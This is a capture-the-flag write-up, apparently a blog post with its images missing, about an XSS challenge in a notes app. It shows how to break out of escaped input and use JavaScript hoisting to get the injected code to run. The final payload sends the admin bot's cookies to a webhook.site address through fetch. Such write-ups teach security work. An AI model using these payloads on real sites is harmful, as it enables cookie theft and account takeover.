None

As we can see there is a link and Source Code files so i will go through them

None

"The application allows creating notes via two input fields. The 'Contact Support' button redirects to the admin bot's reporting page."

None

"Initial testing with <script>alert()</script> revealed that < and > characters were being escaped to < and > respectively."

None

If you check the source code you will find in index.php:

None

So, Input sanitization is applied: All < and > characters are converted to < and > respectively.. I will try to see where the input <script>alert()</script> is reflected.

None

I will try to bypass < > sanitization and using :

');alert('  // so when we inject it will be :
                           secure.validate('remove', '');alert('');

Also failed to alert :( but when you check console :

None

The console reports secure is not defined. That means secure.validate('remove', ''); alert(''); throws before alert() can run.

Using Hoisting we can bypass this

Hoisting: In JavaScript, hoisting means that function and variable declarations are moved to the top of their scope during compilation, before code execution.

The solution is to declare a secure function so it gets hoisted.

', alert()); 
function secure() {}; 
secure('

finally

None

Now I need to find the flag using XSS , I checked bot.js :

None

When the bot visits a URL from the admin report page, it accesses the page with a cookie named flag that contains the our flag.

So, The goal is to exploit an XSS vulnerability to steal the flag cookie.

Now, I prepared my Webhook id to capture the bot's cookies With this payload.

', fetch("https://webhook.site/af2ed571-0b47-4c07-91e8-7e454114eec2/?Flag="+document.cookie));
function secure () {}; 
secure('

but notice Before sending the payload, where the bot's cookies are stored ?

In docker-compose.yml, I found that the bot's cookies are stored at http://proxy

None

So now I will prepare my payload using the note then exploit

None

final payload:

http://proxy/index.php?title=Test&content=http%3A%2F%2Fproxy%27%2C+fetch%28%22https%3A%2F%2Fwebhook.site%2Faf2ed571-0b47-4c07-91e8-7e454114eec2%2F%3FFlag%3D%22%2Bdocument.cookie%29%29%3B%0D%0Afunction+secure+%28%29+%7B%7D%3B+%0D%0Asecure%28%27&category=general
None
None
Finally!!!
None
Read more about XSS Exception Bypass using Hoisting..

I hope it will helpful.